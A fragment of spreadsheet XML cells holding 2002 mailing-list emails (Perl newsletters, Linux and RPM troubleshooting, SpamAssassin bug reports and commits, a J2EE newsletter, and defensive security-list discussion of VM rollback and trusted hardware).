[URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]rochlin writes "Looks like The Perl Journal might not make it up for\nair after all. This blurb is on [1]their website. 'Time is running short\nand we need your help if The Perl Journal is to get another chance at\nbeing the real deal. As of a couple of minutes ago, we only have 881\nsubscriptions and the deadline is fast approaching. Please subscribe now.\nIt only costs 3 cents per day to get the best Perl coverage anywhere.'"\nThey need 3,000 subscribers to move forward.\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.nw-apts.com[/URL]\n    1. [URL]http://www.tpj.com[/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yetanother.org http://use.perl.org http://use.perl.org http://www.nw-apts.com http://www.tpj.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 09 Oct 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-10-09</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nPassing the Parrot Pumpkin\n    posted by KM on Tuesday October 08, @09:11 (parrot)\n    [URL]http://use.perl.org[/URL]\n\nThe Perl Journal On The Ropes\n    posted by pudge on Tuesday October 08, @14:35 (link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fork@spamassassin.taint.org\nFrom: "Stephen D. Williams" &lt;sdw@lig.net&gt;\nDate: Wed, 07 Aug 2002 21:56:12 -0400</t>
  </si>
  <si>
    <t>Wed, 07 Aug 2002 21:56:12 -0400</t>
  </si>
  <si>
    <t>"Stephen D. Williams" &lt;sdw@lig.net&gt;</t>
  </si>
  <si>
    <t>PKI smartcard/CA/profile/email/software interoperability, (real) standards, patents</t>
  </si>
  <si>
    <t>Has anyone had much positive experience with PKI based smartcards, email \n(S/Mime interoperability), programming to smart cards, etc.?\n\nOne area in particular that seems surprising is that a number of \nprojects are using cards like the Datakey 330 which seems to store data \nin a way that is proprietary to particular card/reader driver versions.\n\nI've been told, on the other hand, that Java PKI smart cards are very \ninterchangable and upward compatible.  The only reasons I've been able \nto find so far for using the more 'proprietary' cards is that they may \nbe cheaper and further along in FIPS validation.\n\nsdw\n\n-- \nsdw@lig.net [URL]http://sdw.st[/URL]\nStephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622\n703-724-0118W 703-995-0407Fax Dec2001\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://sdw.st http://xent.com</t>
  </si>
  <si>
    <t>To: Vincent Cunniffe &lt;vincent@cunniffe.net&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 07 Aug 2002 13:05:38 +0100</t>
  </si>
  <si>
    <t>Wed, 07 Aug 2002 13:05:38 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] socket latency query</t>
  </si>
  <si>
    <t>Vincent Cunniffe wrote:\n&gt; Does anyone have any practical experience with high-performance socket \n&gt; code in C++ under Linux, and is there any speed difference between unix \n&gt; domain sockets, loopback sockets, and a real ethernet interface if all \n&gt; of the packets are going from one process on the machine to another \n&gt; process on the same machine?\n\nIn short yes. The more logic involved the longer\nthe CPU is executing it. I.E. there is more logic\nexecuted (including NIC logic) when going down\nto the metal than when using lo. So how much\nlogic is involved for each type of IPC (why\nare you limiting yourself to sockets? there are\nmutexes, shared mem, files, messages...). Anyway the\nbest IPC method to choose is dictated by the data\nyou want to communicate between the processes,\nas the various IPC mechanisms are tuned for\nvarious data types.\n\nIBM are running a series comparing doze and Linux IPC mechanisms.\nThe socket (which references the others at the bottom) is here:\n[URL]http://www-106.ibm.com[/URL],Redhat=Sockets\n\nThe following in google gave useful info also:\n"linux IPC mechanisms compared"\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www-106.ibm.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 07 Aug 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>Wed, 07 Aug 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-08-07</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Underground Movies of My Talks?\n\n+--------------------------------------------------------------------+\n| Underground Movies of My Talks?                                    |\n|   posted by pudge on Tuesday August 06, @06:23 (others)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]Dominus writes "At my talks at TPC this year I noticed people in the\naudience with video recorders. That's fine with me, but now I want to see\nthe recordings! I saw at least two people recording 'Mailing List Judo'\nand 'Conference Presentation Judo.' If you do have a video, please drop\nme a note. Thanks." I wouldn't mind an audio or video recording of my\nYAPC talk either, if someone had such a beast.\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:mjd@plover.com\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yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 07 Aug 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Wed, 07 Aug 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-08-07</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nUnderground Movies of My Talks?\n    posted by pudge on Tuesday August 06, @06:23 (other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exmh-users@spamassassin.taint.org\nFrom: Tom Lane &lt;tgl@sss.pgh.pa.us&gt;\nDate: Wed, 07 Aug 2002 01:38:55 -0400</t>
  </si>
  <si>
    <t>Wed, 07 Aug 2002 01:38:55 -0400</t>
  </si>
  <si>
    <t>Tom Lane &lt;tgl@sss.pgh.pa.us&gt;</t>
  </si>
  <si>
    <t>Re: curses interface to nmh</t>
  </si>
  <si>
    <t>J C Lawrence  writes: &gt; Tom Reingold  wrote: &gt;&gt; Years ago, there was a package called mh-e which was an emacs &gt;&gt; interface to MH.  I don't know if it's still around or works.  But &gt;&gt; it's an idea. &gt; Its still around, its actively maintained, and its quite well evolved. I useta use mh-e regularly, but I never figured out whether it could handle exmh's multidrop mechanism, which is something I've grown to rely on.  Does that work in recent mh-e versions?  I'd love to use mh-e when reading mail remotely, if it can handle my multiple-inbox- folders setup... 			regards, tom lane _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Mark Derricutt &lt;mark@talios.com&gt;\nDate: Wed, 06 Feb 2002 07:44:40 +1300</t>
  </si>
  <si>
    <t>Wed, 06 Feb 2002 07:44:40 +1300</t>
  </si>
  <si>
    <t>Re: Problem with an rpm...</t>
  </si>
  <si>
    <t>Never mind, there was some cron thing doing rpm -qf ???  seems fine now. --On Wednesday, February 06, 2002 07:37:44 +1300 Mark Derricutt   wrote: &gt; Fetched 88.1kB in 2m31s (581B/s) &gt; error: cannot get exclusive lock on /var/lib/rpm/Packages &gt; error: cannot open Packages index using db3 - Operation not permitted (1) &gt; E: could not open RPM database:cannot open Packages index using db3 - &gt; Operation not permitted (1)                                     -- \m/ --   "...if I seem super human I have been misunderstood." (c) Dream Theater          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Mark Derricutt &lt;mark@talios.com&gt;\nDate: Wed, 06 Feb 2002 07:37:44 +1300</t>
  </si>
  <si>
    <t>Wed, 06 Feb 2002 07:37:44 +1300</t>
  </si>
  <si>
    <t>Do I need to do anything to recreate anything after deleting this? I did notice an rpm I made the other day didn't work, and just sat there  for ages  seemingly doing nothing, which probably did this :( Ok, now I get: Fetched 88.1kB in 2m31s (581B/s) error: cannot get exclusive lock on /var/lib/rpm/Packages error: cannot open Packages index using db3 - Operation not permitted (1) E: could not open RPM database:cannot open Packages index using db3 -  Operation not permitted (1) Arrrrg. --On Tuesday, February 05, 2002 15:06:28 +0100 Roy-Magne Mo   wrote: &gt; It's not the rpm, it's the rpm-system with you. The cache seems to have &gt; rottened. Try removing /var/lib/rpm/__db*                                     -- \m/ --   "...if I seem super human I have been misunderstood." (c) Dream Theater          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Ben Mord &lt;bmord@icon-nicholson.com&gt;\nFrom: Crispin Cowan &lt;crispin@wirex.com&gt;\nDate: Wed, 04 Sep 2002 16:30:03 -0700</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 16:30:03 -0700</t>
  </si>
  <si>
    <t>Crispin Cowan &lt;crispin@wirex.com&gt;</t>
  </si>
  <si>
    <t>Ben Mord &lt;bmord@icon-nicholson.com&gt;</t>
  </si>
  <si>
    <t>Re: use of base image / delta image for automated recovery from</t>
  </si>
  <si>
    <t>Ben Mord wrote: &gt;     -----Original Message----- &gt;     *From:* Crispin Cowan [mailto:crispin@wirex.com] &gt;     *Sent:* Wednesday, September 04, 2002 5:46 PM &gt;     *To:* Ben Mord &gt;     *Cc:* Webappsec Securityfocus.Com; SECPROG Securityfocus &gt;     *Subject:* Re: use of base image / delta image for automated &gt;     recovery from attacks &gt; &gt;     Ben Mord wrote: &gt; &gt;&gt;I was inspired by a mode of operation supported by VMWare. [use VMWare's ability to rolll back state to recover from intrusions] &gt;&gt; &gt;     I did my dissertation work in this area (Optimistic Computing &gt;     ) and so was &gt;     interested in applying it to the security problem. Unfortunately, &gt;     you hit a bunch of problems: &gt; &gt;         * When can you "commit" a state as being "good"?  You can't &gt;           run from a redo log forever; the performance and storage &gt;           penalties accumulate. Even log structured file systems &gt;           garbage collect eventually. So you have to commit sometime. &gt;           The problem is that if you commit too eagerly, you might &gt;           commit corrupted state. If you commit too conservatively, &gt;           you eat performance and storage penalties. &gt;         * What do you do if you discover that there is corrupted state &gt;           in the *middle* of your redo log, and you want some of the &gt;           critical state that comes after it? You need some way to dig &gt;           the corruption out of the middle and save the rest. My &gt;           dissertation solves this problem, but you have to re-write &gt;           everything in my programming language :) &gt;         * Just doing this at all imposes substantial performance &gt;           penalties. I love VMWare, and use it every day (the best &gt;           $200 I ever spent on software) but it is not very fast.    &gt; &gt; My proposed solution to the first two problems you mention is to be  &gt; less ambitious. The idea is that you *never* commit - instead, you  &gt; simply revert to base state on reboot. Ah. In that case, you can use something considerably less powerful than  VMWare. All you need is a machine configured to boot from CD-ROM and use  a RAM disk for scratch space. Numerous Linux distros are available that  let you boot a stateless but functional system from CD-ROM. &gt; Obviously, you can't do this with partitions that accrue important  &gt; state, e.g. a partition that stores database table data. ... but if you *do* want some state to persist, then you need a  mountable writable partition. To protect it, you need some kind of  access control management to decide who can do what to the writable  partition, blah blah blah ... and before you know it, the security  problem starts to look just like it does for conventional servers. Simple approxmation to this: make /usr a separate partion, and mount it  read-only:     * The good news: attackers that want to trojan your software have to       reboot, at least.     * The bad news: administrators that want to update your software       have to reboot, at least. Crispin --  Crispin Cowan, Ph.D. Chief Scientist, WireX                      [URL]http://wirex.com[/URL] Security Hardened Linux Distribution:       [URL]http://immunix.org[/URL] Available for purchase: [URL]http://wirex.com[/URL]</t>
  </si>
  <si>
    <t>http://wirex.com http://immunix.org http://wirex.com</t>
  </si>
  <si>
    <t>To: "zeek" &lt;zeek@sparklehouse.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 04 Sep 2002 16:17:50 +0100</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 16:17:50 +0100</t>
  </si>
  <si>
    <t>Re: [SAtalk] BUG: spamd --allowed-ips=[127.0.0.1 must be first]</t>
  </si>
  <si>
    <t>"zeek" said:\n\n&gt; This was thoroughly confusing, but by playing musical chairs with the spamd\n&gt; args I smashed a bug:\n&gt; \n&gt; OK:\n&gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1\n&gt; 27.0.0.1"\n&gt; OK:\n&gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1\n&gt; 27.0.0.1, 192.168.1.1"\n&gt; NOT OK:\n&gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1\n&gt; 92.168.1.1, 127.0.0.1"\n\nfwiw, I can't reproduce this with\n\n  spamd --debug --auto-whitelist --allowed-ips="127.0.0.1"\n  spamd --debug --auto-whitelist --allowed-ips="127.0.0.1, 192.168.1.1"\n  spamd --debug --auto-whitelist --allowed-ips="192.168.1.1, 127.0.0.1"\n\nwhich I presume is what you meant (except for the missing args\nof course).  They all seem to work OK.\n\n--j.\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mothlight@fastmail.fm\nFrom: "TheServerSide Connectionnewsletter@theserverside.com [mothlight/serverside.com]" &lt;ticket_jcehaoa1031163663480@sneakemail.com&gt;\nDate: Wed, 04 Sep 2002 13:08:00 -0500</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 13:08:00 -0500</t>
  </si>
  <si>
    <t>"TheServerSide Connectionnewsletter@theserverside.com [mothlight/serverside.com]" &lt;ticket_jcehaoa1031163663480@sneakemail.com&gt;</t>
  </si>
  <si>
    <t>mothlight@fastmail.fm</t>
  </si>
  <si>
    <t>Struts 1.1 Article, JavaServer Faces Tech Talk, iXML &amp; Widget Pages Patterns, JRun 4.0 Review</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit =================================     TheServerSide Connection -Your J2EE Community Newsletter- ================================= September 4, 2002      Circulation: 130 000+           No. 42  IN THIS ISSUE  -------------------------------------------------------------------------------- Featured Articles   o Struts 1.1: Should I Upgrade?  Hard Core Tech Talks  o Amy Fowler - Senior Staff Engineer, Java Software, Sun Microsystems  Upcoming Conferences   o Great Lakes Software Symposium 2002  Enterprise Java Education Strategies   o Floyd Marinescu to co-teach J2EE Patterns - Sept 16, Dallas  New Patterns   o iXML Pattern   o Widget Pages  New App Server Reviews   o JRun 4.0 - Good Stuff  Key J2EE Industry News Headlines   Some key headlines:   o Java Server Faces Public Draft and Early Access Available   o Apache Cactus 1.4 J2EE Unit Testing Framework Released  This newsletter is available in HTML format at: [URL]http://www.theserverside.com[/URL] --==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 7bit  TheServerSide.com Newsletter #42 September 4, 2002Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Circulation: 130 000+Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â No. 42 Â This newsletter sponsored in part by Rational  RationalÂ® XDE Is Here -- Developing Javaâ„¢ Software Will Never Be The Same. RationalÂ® XDEâ„¢ Professional is an eXtended Development Environment for  Java developers. Use it with your choice of IDE - as a standalone IDE or install  it into IBMÂ® WebSphereâ„¢ Studio Application Developer. It runs in the IDE.  Visualize your code while you develop. Order your FREE Rational Developer  Solutions CD and try Rational XDE now! In This Issue  Featured Articles   Â o Struts 1.1: Should I Upgrade?  Hard Core Tech Talks   Â o Amy Fowler - Senior Staff Engineer, Java Software, Sun Microsystems      Upcoming Conferences    Â o  Great Lakes Software Symposium 2002      Enterprise Java Education Strategies    Â o Floyd Marinescu to co-teach J2EE Patterns - Sept 16, Dallas   New Patterns    Â o iXML Pattern         Â o Widget Pages       New App Server Reviews    Â o JRun 4.0 - Good Stuff   Key J2EE Industry News Headlines    Â Some key headlines:    Â o Java Server Faces Public Draft and Early Access Available           Â o Apache Cactus 1.4 J2EE Unit Testing Framework Released        This newsletter is transmitted twice a month. It is printer-friendly and available   online Featured Articles   Struts 1.1: Should I Upgrade?  By John Yu Built on the success of Struts 1.0, Struts 1.1 beta was released in March this year and showcased at JavaOne 2002. This article describes the new features found in Apache Struts 1.1 beta and the impact of migration from Struts 1.0 to Struts 1.1. It also offers advice on the migration decision and the upgrade process. Read the article here Back to Top Â This newsletter is sponsored in part by BEA BEA dev2dev Days - Application Development for the 21st Century. Prepare yourself for dev2dev Days, the premier worldwide developer education event from BEA. A full day of serious enterprise development instruction, including in-depth code-level demonstrations and J2EE training. Get the skills you need to tackle your toughest integration and development challenges. We're coming to a city near you! New Hard Core Tech Talks    Get leading edge information on J2EE from those who  know it best, in Hard Core Tech Talks!  Videos Hosted on HostJ2EE.com.  Featured this week is Amy Fowler, who talks about the JavaServer Faces Specification.  Senior Staff Engineer, Java Software, Sun Microsystems    In this interview, Amy talks about the problems JavaServer Faces (JSF) solves and how J2EE developers can leverage it in their Web apps. She looks at UI components used in JSF, the implementation of event handling code, and describes a typical use case involving JSF. She also discusses interoperability with JSF using Struts, Webwork, and the Portlet API.  Click here to watch Amy Fowler's Video Interview Back to Top Upcoming Conferences Great Lakes Software Symposium 2002   October 25-27, 2002 - Chicago         	    Presented By,     A three day J2EE/XML/Web Services conference for Java developers, Java Architects and Technical Project Managers with 48 presentations to select from and features Bruce Tate, author of "Bitter Java", The Middleware Company's own Bruce Martin presenting on XBeans, and many others.   Get more conference info here Back to Top Enterprise Java Education Strategies Floyd Marinescu to co-teach J2EE Patterns - Sept 16, Dallas  Dear TSS Members, I thought you'd be interested to know that The Middleware Company has created a J2EE Patterns training course that I will be co-teaching in Dallas during the week of September 16th. The course combines and improves upon the best J2EE design patterns material available in my book EJB Design Patterns, Sun's Core Patterns, TheServerSide's patterns repository and others.  I have just reviewed the final material and I am very excited with the end product. This class takes an indepth look at all the most important patterns today, both from a theoretical and a practical perspective. One of the cool things about the course is that it shows you how the patterns were implemented in a variety of popular open source frameworks and production applications, including TheServerSide.com.  I highly recommend this course to the seasoned J2EE developer who wants to master the cutting edge in J2EE architecture and design.  If you'd like to register for the course, simply click here:  [URL]http://www.middleware-company.com[/URL] Sincerely,  Floyd Marinescu  Author, EJB Design Patterns  Director of TheServerSide.com J2EE Community  Back to Top New Patterns    iXML Pattern     By Venkatesh Balakumar        In due course, we will be finding ourselves in the middle of Web services, which will granulate into representing all data in XML. For preparing and implementing Web services, it's necessary to express all data in XML. This pattern does the same. Read more on this pattern.  Widget Pages     By Guilherme Silva        This pattern allows for using XMLC and Barracuda without exposing their APIs to widget users. In fact it allows for transparently using more than one widget implementation at the same time, which is ideal for migrating or upgrading.  Read more on this pattern. Back to Top New App Server Reviews   JRun 4.0 - Good Stuff      By Jason McKerr        Some general impressions I had of JRun: It's very easy to get it up and running.   Allaire-now-Macromedia has always had one of my favorite servlet engines.  The Java Management Console (web-based admin interface) has gotten a tonne better.   It's dead easy to plug into just about any IDE (I've done it with JBuilder Enterprise 6, and the Intellij IDEA EAP (Builds 640 -642).  The JSP compiler is smokin! Very, very fast. I think it must come with Jikes or something.  Read more on this review. Back to Top Â This newsletter sponsored in part by Borland  Borland(R) - #1 in Javaâ„¢ Development Solutions. Discover the key to success with Java technologies from the industry leader. Develop to deploy with the award-winning Borland software  platform for Java. Get your FREE "Enterprise Guide to Java Development"  at [URL]http://borland.atre.net[/URL]           Key J2EE Industry Headlines    Oracle Releases Preview of New J2EE 1.3 JDeveloper IDE    Oracle has released a preview (v9.0.3) of the JDeveloper IDE. This release introduces full J2EE 1.3 development support starting from UML modeling of EJB's and Web Services, to development, debugging, tuning and deployment, with full integration with Ant, Struts 1.1 and JUnit.   Click here to read more.    Java Server Faces Public Draft and Early Access Available    The public draft of the JavaServer Faces 1.0 Specification has been published, as well as an early access download of the API's and tag library. JSF is a web application framework that reduces the amount of code needed to write a web front end. Developers need only write JSF components and corresponding event handling code, the framework then simplifies the tasks of validation, request parameter parsing, state management, multipe clients support, etc.   Click here to read more.    Meta Group: J2EE Complexity Holding Back Platform Adoption   The Meta Group has released a research report saying that the relative complexity of doing server-side development using J2EE is hurting adoption of the platform. Among other predictions are the continuing dominance of BEA and IBM, more consolidation, and increasing vendor competition in tools and frameworks.     Click here to read more.    IBM nudges back release of WebSphere 5.0   IBM has rescheduled its release of J2EE 1.3 certified Websphere Application Server 5 from September to late November, saying it "reprioritized" its schedule in order to release Websphere Studio 5 first - a break from the usual order of releases. Analysts said the delay shouldn't be seen as a big setback.     Click here to read more.    Apache Cactus 1.4 J2EE Unit Testing Framework Released    Cactus 1.4 (part of the Apache Jakarta project) is now available for download. Cactus is a simple test framework for unit testing server-side java code (Servlets, EJBs, Tag Libs, Filters) that uses and extends the jUnit framework. V1.4 includes many new improvements, including the ability to assert for specific HTTP response codes.  Click here to read more.    WebWork 1.2 Web Application Framework Released    Version 1.2 of WebWork is now available. The release includes significant improvements and marks the first release since integrating into the OpenSymphony project (home of SiteMesh, OSCache, etc). WebWork is a pull HMVC web application framework in Java, developed as Open Source (Apache license).     Click here to read more.    JADE Open Framework 1.1 Released with Eclipse Integration    Salmon LLC is pleased to announce the release of JADE 1.1, the open source rapid application development tool for the J2EE. JADE is a Java framework and JSP tag library that integrates with Dreamweaver, IntelliJ IDEA and now Eclipse. JADE was released as open source only a few months ago, but has been used privately as the foundation for a J2EE consulting practice for several years.  Click here to read more. Back to Top UNSUBSCRIBE If you are receiving this newsletter it is because you signed up as a    member of TheServerSide.com and elected to receive our newsletters. To    unsubscribe from TheServerSide.com's bi-weekly newsletter, log on to    TheServerSide and edit your user profile. Email webmaster@theserverside.com if    you are having problems editing your profile.  This newsletter and contents are Copyright (c) 2002 The Middleware Company --==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--</t>
  </si>
  <si>
    <t>http://www.theserverside.com http://www.middleware-company.com http://borland.atre.net</t>
  </si>
  <si>
    <t>To: Yannick Gingras &lt;ygingras@ygingras.net&gt;\nFrom: Ben Laurie &lt;ben@algroup.co.uk&gt;\nDate: Wed, 04 Sep 2002 11:47:56 +0100</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 11:47:56 +0100</t>
  </si>
  <si>
    <t>Ben Laurie &lt;ben@algroup.co.uk&gt;</t>
  </si>
  <si>
    <t>Yannick Gingras wrote:\n&gt; Is the use of "trusted hardware" really worth it ?  Does it really make it \n&gt; more secure ?  Look at the DVDs.\n\nDVDs don't use trusted hardware. As for whether it is worth it, that \ndepends entirely on what its worth to secure your software.\n\nCheers,\n\nBen.\n\n-- \n[URL]http://www.apache-ssl.org[/URL]       [URL]http://www.thebunker.net[/URL]\n\n"There is no limit to what a man can do or how far he can go if he\ndoesn't mind who gets the credit." - Robert Woodruff</t>
  </si>
  <si>
    <t>http://www.apache-ssl.org http://www.thebunker.net</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 04 Sep 2002 08:22:42 -0700</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 08:22:42 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.91.2.7,1.91.2.8</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin In directory usw-pr-cvs1:/tmp/cvs-serv17809/lib/Mail/SpamAssassin Modified Files:       Tag: b2_4_0 	Conf.pm  Log Message: added deprecation regarding starting line with space; reserved for future use; also changed sample version_tag Index: Conf.pm =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v retrieving revision 1.91.2.7 retrieving revision 1.91.2.8 diff -b -w -u -d -r1.91.2.7 -r1.91.2.8 --- Conf.pm	29 Aug 2002 14:52:43 -0000	1.91.2.7 +++ Conf.pm	4 Sep 2002 15:22:39 -0000	1.91.2.8 @@ -24,8 +24,11 @@  files, loaded from the /usr/share/spamassassin and /etc/mail/spamassassin  directories.   -The C&lt;#&gt; character starts a comment, which continues until end of line, -and whitespace in the files is not significant. +The C&lt;#&gt; character starts a comment, which continues until end of line. + +Whitespace in the files is not significant, but please note that starting a +line with whitespace is deprecated, as we reserve its use for multi-line rule +definitions, at some point in the future.    Paths can use C&lt;~&gt; to refer to the user's home directory.   @@ -257,7 +260,7 @@    eg.   -  version_tag perkel2    # version=2.40-perkel2 +  version_tag myrules1    # version=2.41-myrules1    =cut   ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 04 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-04</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Perl CMS Systems\n    * 1998 Perl Conference CD Online\n    * Bricolage 1.4.0 Escapes!\n\n+--------------------------------------------------------------------+\n| Perl CMS Systems                                                   |\n|   posted by ziggy on Tuesday September 03, @05:00 (tools)          |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nKLB writes "[0]Krow, one of the authors of [1]Slash, has written up a\n[2]review on [3]Linux.com of two other Perl CMS systems, the E2 and LJ\nengines. Makes for interesting reading."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://krow.net[/URL]\n    1. [URL]http://slashcode.com[/URL]\n    2. [URL]http://newsforge.com[/URL]\n    3. [URL]http://linux.com[/URL]\n\n\n+--------------------------------------------------------------------+\n| 1998 Perl Conference CD Online                                     |\n|   posted by gnat on Tuesday September 03, @19:34 (news)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]gnat writes "[1]The 1998 Perl Conference CD is online on perl.org.\nEnjoy the blast from the past (was [2]this Damian's first public\nappearance?)" (thanks to Daniel Berger for packratting the CD!)\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:gnat@oreilly.com\n    1. [URL]http://www.perl.org[/URL]\n    2. [URL]http://www.perl.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| Bricolage 1.4.0 Escapes!                                           |\n|   posted by chip on Tuesday September 03, @19:57 (tools)           |\n|   [URL]http://use.perl.org[/URL]               |\n+--------------------------------------------------------------------+\n\n[0]Theory writes "Bricolage 1.4.0 has finally escaped the shackles of its\nCVS repository! ... Bricolage is a full-featured, enterprise-class\ncontent management and publishing system. It offers a browser-based\ninterface for ease-of use, a full-fledged templating system with complete\nprogramming language support for flexibility, and many other features\n(see below). It operates in an Apache/mod_perl environment, and uses the\nPostgreSQL RDBMS for its repository."\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://bricolage.cc[/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krow.net http://slashcode.com http://newsforge.com http://linux.com http://use.perl.org http://use.perl.org http://www.perl.org http://www.perl.org http://use.perl.org http://use.perl.org http://use.perl.org http://bricolage.cc http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 04 Sep 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Sep 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-04</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nPerl CMS Systems\n    posted by ziggy on Tuesday September 03, @05:00 (tools)\n    [URL]http://use.perl.org[/URL]\n\n1998 Perl Conference CD Online\n    posted by gnat on Tuesday September 03, @19:34 (news)\n    [URL]http://use.perl.org[/URL]\n\nBricolage 1.4.0 Escapes!\n    posted by chip on Tuesday September 03, @19:57 (tool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 http://use.perl.org</t>
  </si>
  <si>
    <t>To: "'ILUG@linux.ie'" &lt;ILUG@linux.ie&gt;\nFrom: Nick Murtagh &lt;nickm@go2.ie&gt;\nDate: Wed, 04 Dec 2002 11:48:43 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 11:48:43 +0000</t>
  </si>
  <si>
    <t>Gianni Ponzi wrote:\n&gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my\n&gt; laptop. I can start the install but after about 2min, the whole pc just\n&gt; dies.\n\nCan you disable DMA and see if this makes a difference?\n\nNick\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 04 Dec 2002 11:41:52 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 11:41:52 +0000</t>
  </si>
  <si>
    <t>[zzzzteana] Surfing the tube</t>
  </si>
  <si>
